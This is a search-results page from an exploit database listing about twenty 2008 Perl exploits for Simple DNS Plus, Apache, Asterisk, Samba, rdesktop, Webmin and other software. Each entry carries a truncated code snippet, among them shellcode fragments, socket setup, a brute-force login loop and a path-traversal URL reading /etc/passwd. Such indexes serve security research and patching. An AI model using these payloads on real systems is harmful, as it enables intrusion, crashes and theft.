Lucene search
+L

984 matches found

exploitpack
exploitpack
added 2008/07/13 12:0 a.m.22 views

Simple DNS Plus 5.04.1 - Remote Denial of Service

Simple DNS Plus 5.04.1 - Remote Denial of Service !/usr/bin/perl Simple DNS Plus 5.0/4.1 Exploit written by Exodus. http://www.blackhat.org.il use IO::Socket; if@ARGV "; $sock = IO::Socket::INET-newPeerAddr = "$ARGV0:$ARGV1", Proto = 'UDP' || die"Cant connect DNS server"; $address = $ARGV0; $tran...

7.4AI score
SaveExploits0
Packet Storm
Packet Storm
added 2008/07/10 12:0 a.m.39 views

fuzzylinecms-exec.txt

!/usr/bin/perl fuzzylime 3.0.1 Perl exploit discovered & written by Ams [email protected] DESCRIPTION: There are availability to load files through script rss.php, and also there are unfiltered extract; usage. This exploit creates shell in /code/counter/middleindexinc.php USAGE: Run exploit: perl...

7.4AI score
SaveExploits0
seebug.org
seebug.org
added 2008/07/07 12:0 a.m.27 views

Apache <= 2.0.49 Arbitrary Long HTTP Headers Denial of Service

No description provided by source. /usr/bin/perl -w use IO::Socket::INET; usage unless @ARGV == 2; my $host = shift@ARGV; my $port = shift@ARGV; sub usage print "\n"; print "\n Apache HTTPd Arbitrary Long HTTP Headers DoS \n"; print " Tested Versions : 2 2.0.49 \n"; print " Adv :...

7.1AI score
SaveExploits0
seebug.org
seebug.org
added 2008/07/07 12:0 a.m.18 views

Emulive Server4 7560 Remote Denial of Service Exploit

No description provided by source. !/usr/bin/perl EmuLive Server4 Commerce Edition Build 7560 Remote crash proof of conecpt code. When the machine running Server4 recieves a malformed request on TCP port 66 it crashes very hard! GulfTech Security http://www.gulftech.org use IO::Socket; unless...

7.1AI score
SaveExploits0
exploitpack
exploitpack
added 2008/07/07 12:0 a.m.20 views

QNX Neutrino 0.8.4 Atomic Edition - Remote Code Execution

QNX Neutrino 0.8.4 Atomic Edition - Remote Code Execution !/usr/bin/perl Neutrino 0.8.4 Atomic Edition Perl exploit discovered & written by Ams [email protected] DESCRIPTION: First exploit destroys "/data/sess.php" file simply strips tags, then we are able to bypass authorization and using admin...

0.3AI score
SaveExploits0
zdt
zdt
added 2008/06/08 12:0 a.m.15 views

Galatolo Web Manager 1.0 XSS / Local File Inclusion Vulnerability

Exploit for unknown platform in category web applications ================================================================= Galatolo Web Manager 1.0 XSS / Local File Inclusion Vulnerability ================================================================= !/usr/bin/perl Galatolo Web Manager 1.0...

7.1AI score
SaveExploits0
exploitpack
exploitpack
added 2008/06/08 12:0 a.m.11 views

Galatolo Web Manager 1.0 - Cross-Site Scripting Local File Inclusion

Galatolo Web Manager 1.0 - Cross-Site Scripting Local File Inclusion !/usr/bin/perl Galatolo Web Manager 1.0 Remote Command Execution Exploit by yeat - stakerathotmaildotit use IO::Socket; use LWP::UserAgent; my $lwp,$response = new LWP::UserAgent; my $host,$path = @ARGV; if @ARGV != 2 print...

0.2AI score
SaveExploits0
seebug.org
seebug.org
added 2008/06/05 12:0 a.m.24 views

Webmin BruteForce and Command Execution Exploit

No description provided by source. !/usr/bin/perl Webmin BruteForce + Command execution - By Di42lo [email protected] usage ./bruteforce.webmin.pl host command ./bruteforce.webmin.pl 192.168.0.5 "uptime" + BruteForcing... + trying to enter with: admim + trying to enter with: admin...

7.1AI score
SaveExploits0
Packet Storm
Packet Storm
added 2008/06/05 12:0 a.m.32 views

asterisksip-dos.txt

!/usr/bin/perl -w asterisk AST-2008-008 by [email protected] AST-2008-008 - Remote Crash Vulnerability in SIP channel driver when run in pedantic mode use Getopt::Std; use IO::Socket; use strict; my %args; getopts"h:p:", %args; if !$argsh || !$argsp usage; my $sock = IO::Socket::INET-new...

7.4AI score
SaveExploits0
seebug.org
seebug.org
added 2008/06/05 12:0 a.m.23 views

BlackJumboDog Remote Buffer Overflow Exploit

No description provided by source. !/usr/bin/perl blackJumboDog Exploit code by Tal zeltzer use strict; use IO::Socket::INET; usage unless@ARGV == 2; my $host = shift@ARGV; my $port = shift@ARGV; win32bind - Encoded Shellcode \x00\x0a\x09 EXITFUNC=seh LPORT=4444 Size=399 http://metasploit.com my...

7.1AI score
SaveExploits0
seebug.org
seebug.org
added 2008/06/05 12:0 a.m.16 views

Monit <= 4.1 Remote Root Buffer Overflow Exploit

No description provided by source. !/usr/bin/perl monit = 4.1 remote root exploit coded by gsicht 09.04.04 use IO::Socket::INET; $socket = 0; my $shellcode = 8 + 88 = 96 bytes portbind 31337 "\x90\x90\x90\x90\x90\x90\x90\x90" . "\x90\x90\x90\x90\x90\x90\x90\x90" . "\x31\xc0\x31\xdb\xb0\x17\xcd\x8...

7.1AI score
SaveExploits0
Packet Storm
Packet Storm
added 2008/06/05 12:0 a.m.35 views

joomlaeasy-sql.txt

!/usr/bin/perl use IO::Socket; use strict; INFO Example: Host: xxx.lu &md: 0f8ab366793a0d1da85c6f5a8d4fb576 print "-+-- Joomla Component EasyBook 1.1 SQL Injection Exploit--+-\n"; print "-+-- --+-\n"; print "-+-- Author: ZAMUT --+-\n"; print "-+-- Vuln: gbid= --+-\n"; print "-+-- Homepage:...

7.4AI score
SaveExploits0
Exploit DB
Exploit DB
added 2008/06/05 12:0 a.m.39 views

Asterisk 1.2.x - SIP channel driver / in pedantic mode Remote Crash

!/usr/bin/perl -w asterisk AST-2008-008 by [email protected] AST-2008-008 - Remote Crash Vulnerability in SIP channel driver when run in pedantic mode use Getopt::Std; use IO::Socket; use strict; my %args; getopts"h:p:", %args; if !$argsh || !$argsp usage; my $sock = IO::Socket::INET-new...

4.3CVSS5.8AI score0.07273EPSS
SaveExploits2
exploitpack
exploitpack
added 2008/06/01 12:0 a.m.14 views

Samba 3.0.29 (Client) - receive_smb_raw() Buffer Overflow (PoC)

Samba 3.0.29 Client - receivesmbraw Buffer Overflow PoC !/usr/bin/perl 06/01/2008 - ksOSe smbclient //localhost/w00t glibc detected smbclient: free: invalid next size fast: 0x0823c2d8 use warnings; use strict; use IO::Socket; my $sock = IO::Socket::INET-newLocalAddr = '0.0.0.0', LocalPort = '445'...

0.6AI score
SaveExploits0
Exploit DB
Exploit DB
added 2008/06/01 12:0 a.m.143 views

Samba 3.0.29 (Client) - 'receive_smb_raw()' Buffer Overflow (PoC)

!/usr/bin/perl 06/01/2008 - ksOSe smbclient //localhost/w00t glibc detected smbclient: free: invalid next size fast: 0x0823c2d8 use warnings; use strict; use IO::Socket; my $sock = IO::Socket::INET-newLocalAddr = '0.0.0.0', LocalPort = '445', Listen = 1, Reuse = 1 || die$!; whilemy $csock =...

7.5CVSS7.2AI score0.69085EPSS
SaveExploits3
Packet Storm
Packet Storm
added 2008/05/20 12:0 a.m.22 views

entertainment-lfi.txt

!/usr/bin/perl EntertainmentScript V1.4.0 page.php page Local File Inclusion Exploit Founded & Exploited by : Stack-Terrorist v40 Contact: Ev!L = see down Greetz : Houssamix & Djekmani & Jadi & iuoisn & All muslims HaCkeRs : P0c : http://localhost.il/page.php?page=../../../../../etc/passwd%00...

7.4AI score
SaveExploits0
exploitpack
exploitpack
added 2008/05/11 12:0 a.m.25 views

rdesktop 1.5.0 - process_redirect_pdu() BSS Overflow (PoC)

rdesktop 1.5.0 - processredirectpdu BSS Overflow PoC !/usr/bin/perl http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=697 use strict; use IO::Socket; my $sock = IO::Socket::INET-newLocalAddr = '0.0.0.0', LocalPort = '3389', Listen = 1, Reuse = 1 || die$!; my $evil =...

0.4AI score
SaveExploits0
zdt
zdt
added 2008/05/11 12:0 a.m.26 views

rdesktop 1.5.0 process_redirect_pdu() BSS Overflow Vulnerability PoC

Exploit for linux platform in category dos / poc ==================================================================== rdesktop 1.5.0 processredirectpdu BSS Overflow Vulnerability PoC ==================================================================== !/usr/bin/perl...

7AI score
SaveExploits0
Exploit DB
Exploit DB
added 2008/05/11 12:0 a.m.39 views

rdesktop 1.5.0 - 'process_redirect_pdu()' BSS Overflow (PoC)

!/usr/bin/perl http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=697 use strict; use IO::Socket; my $sock = IO::Socket::INET-newLocalAddr = '0.0.0.0', LocalPort = '3389', Listen = 1, Reuse = 1 || die$!; my $evil = "\x03\x00\x01\x47\x02\xf0\x80\x68\x00\x01\x03\xeb\x70\x81\x38"...

9.3CVSS7.2AI score0.12978EPSS
SaveExploits4
seebug.org
seebug.org
added 2008/05/10 12:0 a.m.37 views

TFTP Server for Windows 1.4 ST Remote BSS Overflow Exploit

No description provided by source. !/usr/bin/perl TFTPServer SP v1.4 for Windows remote .bss overflow exploit The Service or the RunStandAlone version. URL: http://sourceforge.net/projects/tftp-server/ Author: tix or tixxDZ [email protected] Date: 07/05/2008...

7.1AI score
SaveExploits0
Rows per page
Query Builder